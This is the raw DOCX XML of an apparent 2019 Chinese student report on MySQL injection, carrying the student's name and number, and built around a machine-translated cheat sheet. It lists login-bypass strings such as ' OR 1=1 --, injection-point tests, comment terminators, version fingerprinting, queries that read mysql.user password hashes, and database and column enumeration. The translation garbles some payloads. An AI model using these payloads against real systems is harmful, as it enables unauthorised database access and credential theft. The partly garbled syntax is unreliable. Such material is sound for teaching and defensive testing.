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Cs w:val="28"/>
        </w:rPr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2867025" cy="828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pStyle w:val="8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="6675" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="-6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4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941" w:type="dxa"/>
            <w:vAlign w:val="bottom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36"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none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28"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>姓名：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473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sz w:val="36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6"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>骆硕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941" w:type="dxa"/>
            <w:vAlign w:val="bottom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36"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none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28"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>学号：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473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sz w:val="36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6"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3116004512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941" w:type="dxa"/>
            <w:vAlign w:val="bottom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36"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none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28"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>院系：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473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36"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>智能制造学部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941" w:type="dxa"/>
            <w:vAlign w:val="bottom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36"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none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28"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>专业：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473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sz w:val="36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6"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>电子信息工程（信息安全）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941" w:type="dxa"/>
            <w:vAlign w:val="bottom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b/>
                <w:bCs/>
                <w:sz w:val="36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28"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>指导老师：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473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/>
                <w:bCs/>
                <w:sz w:val="36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6"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>温强</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>报告提交时间：20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>日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1.默认数据库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36"/>
        <w:gridCol w:w="4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MySQL的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284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需要root权限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INFORMATION_SCHEMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284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适用于5及更高版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2.测试注射</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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False表示查询无效（MySQL错误/网站上缺少内容）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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True表示查询有效（内容像往常一样显示）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9" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center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字符串</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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鉴于查询 </w:t>
            </w:r>
            <w:r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SELECT * FROM Table WHERE id = '1';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53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“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“”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真正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“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“”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真正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\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\\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真正</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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例子：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/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SELECT * FROM Articles WHERE id ='1 '' ';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/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SELECT 1 FROM dual WHERE 1 ='1 ''''''''''''UNION SELECT'2 ';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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笔记：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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您可以根据需要使用尽可能多的撇号和引号，只要它们配对即可。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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也可以在引号链后继续声明。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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行情逃脱报价。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9" w:hRule="atLeast"/>
        </w:trPr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数字</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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鉴于查询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 </w:t>
            </w:r>
            <w:r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SELECT * FROM Table WHERE id = 1;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53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AND 1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真正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AND 0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AND true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真正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AND false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1-false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如果易受攻击则返回1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1-true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如果易受攻击则返回0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1*56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如果易受伤害则返回56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1*56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如果不脆弱则返回1</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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例子：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/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SELECT * FROM Users WHERE id = 3 -2;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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笔记：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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true 等于1。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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false 等于0。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="F3F3F7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9" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val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在登陆中</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Tahoma"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="000000"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:fill="F3F3F7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鉴于查询 </w:t>
            </w:r>
            <w:r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SELECT * FROM Table WHERE username = '';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8306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 w:firstLine="0" w:firstLine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'或'1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 w:firstLine="0" w:firstLine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</w:rPr>
                    <w:t>'或1 - -'或1 - -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 w:firstLine="0" w:firstLine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</w:rPr>
                    <w:t>“或”“=”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 w:firstLine="0" w:firstLine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</w:rPr>
                    <w:t>“或1 = 1 - -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 w:firstLine="0" w:firstLine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</w:rPr>
                    <w:t>'='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 w:firstLine="0" w:firstLine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</w:rPr>
                    <w:t>'喜欢'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 w:firstLine="0" w:firstLine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</w:rPr>
                    <w:t>“= 0 - +</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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例：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="000000"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:fill="F3F3F7"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r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SELECT * FROM Users WHERE username ='Mike'AND password =' 'OR''=' ';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="F3F3F7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3.注释掉查询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1" w:hRule="atLeast"/>
        </w:trPr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注入后，以下内容可用于注释掉查询的其余部分：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53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Fonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"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  <w:t>#</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153" w:type="dxa"/>
                  <w:vAlign w:val="top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>哈希评论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top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>/ *</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153" w:type="dxa"/>
                  <w:vAlign w:val="top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>C风格的评论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top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>- -</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153" w:type="dxa"/>
                  <w:vAlign w:val="top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>SQL评论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top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>;％00</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153" w:type="dxa"/>
                  <w:vAlign w:val="top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>Nullbyte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top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>`</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153" w:type="dxa"/>
                  <w:vAlign w:val="top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>反引号</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/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例子：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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SELECT * FROM Users WHERE username =''OR 1 = 1 - - 'AND password ='';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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SELECT * FROM Users WHERE id =''UNION SELECT 1,2,3` ';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/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注意：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both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sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7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反引号只能在用作别名时用于结束查询。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:p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4.测试版本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76" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val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变量</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr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VERSION()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr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@@VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr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@@GLOBAL.VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/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例子：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr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SELECT * FROM Users WHERE id ='1'AND MID（VERSION（），1,1）='5';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/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注意：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs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3F3F7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 如果DBMS在基于Windows的计算机上运行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，</w:t>
            </w:r>
            <w:r>
              <w:rPr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则输出将包含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-nt-log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi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。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:p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8" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val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具体代码</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr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/*!VERSION Specific Code*/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br w:type="textWrapping"/>
            </w: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例：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鉴于查询 </w:t>
            </w:r>
            <w:r>
              <w:rPr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 * FROM Users limit 1,{INJECTION POINT};</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="9"/>
              <w:tblW w:w="8640" w:type="dxa"/>
              <w:tblInd w:w="-6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320"/>
              <w:gridCol w:w="432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ind w:left="0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</w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Tahoma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-SA"/>
                    </w:rPr>
                    <w:t>1 / *！50094eaea * / ;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ind w:left="0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假 - 版本等于或大于5.00.94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ind w:left="0"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Tahoma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eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Tahoma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-SA"/>
                    </w:rPr>
                    <w:t>1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ind w:left="0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True - 版本小于5.00.96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ind w:left="0"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Tahoma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eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Tahoma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-SA"/>
                    </w:rPr>
                    <w:t>1 / *！50095eaea * /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center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ind w:left="0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假 - 版本等于5.00.95</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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注意：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在由于注入位置而无法再向查询添加SQL的情况下，确定版本非常有用。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eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:i w:val="0"/>
                <w:iCs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有关MySQL特定代码的更多信息，请参阅</w:t>
            </w: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fldChar w:fldCharType="begin"/>
            </w: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instrText xml:space="preserve"> HYPERLINK "https://websec.ca/kb/sql_injection?tdsourcetag=s_pcqq_aiomsg" \l "MySQL_Specific_Code" </w:instrText>
            </w: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MySQL特定代码</w:t>
            </w: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。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:p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数据库凭据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1" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr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53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 w:firstLine="0" w:firstLine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表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 w:firstLine="0" w:firstLine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mysql.user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 w:firstLine="0" w:firstLine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列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 w:firstLine="0" w:firstLine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用户密码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 w:firstLine="0" w:firstLine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当前用户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 w:firstLine="0" w:firstLine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user（），current_user（），current_user，system_user（），session_user（）</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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例子：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 database（） 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 schema_name FROM information_schema.schemata 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sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7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 DISTINCT（db）FROM mysql.db ; - （特权）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6.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数据库名称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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr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53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 w:firstLine="0" w:firstLine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表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 w:firstLine="0" w:firstLine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information_schema.schemata，mysql.db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 w:firstLine="0" w:firstLine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列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 w:firstLine="0" w:firstLine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schema_name，db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 w:firstLine="0" w:firstLine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当前的DB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 w:firstLine="0" w:firstLine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database（），schema（）</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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例子：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 database（） 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 schema_name FROM information_schema.schemata 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sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7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 DISTINCT（db）FROM mysql.db ; - （特权）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7.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服务器主机名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@@主机名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br w:type="textWrapping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例：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sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7"/>
                <w:vertAlign w:val="baseline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SELECT @@ hostname ;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8.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服务器MAC地址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通用唯一标识符是128位数字，其中最后12位数字由接口MAC地址形成。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UUID（）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br w:type="textWrapping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输出：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aaaaaaaa-bbbb-cccc-dddd- eeeeeeeeeeee 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注意：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sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7"/>
                <w:vertAlign w:val="baseline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可能会在某些操作系统上返回48位随机字符串而不是MAC地址。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9.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表和列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/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确定列数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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8520" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:i w:val="0"/>
                <w:iCs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iCs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订单/分组依据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GROUP/ORDER BY n+1;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笔记：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继续增加数字，直到得到错误的回复。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尽管GROUP BY和ORDER BY在SQL中具有不同的功能，但它们都可以以完全相同的方式用于确定查询中的列数。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br w:type="textWrapping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例：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鉴于查询 </w:t>
            </w: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 username, password, permission FROM Users WHERE id = '{INJECTION POINT}';</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="10"/>
              <w:tblW w:w="8419" w:type="dxa"/>
              <w:tblInd w:w="-11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66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66" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>1'订购1 - +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Fonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>真正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66" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
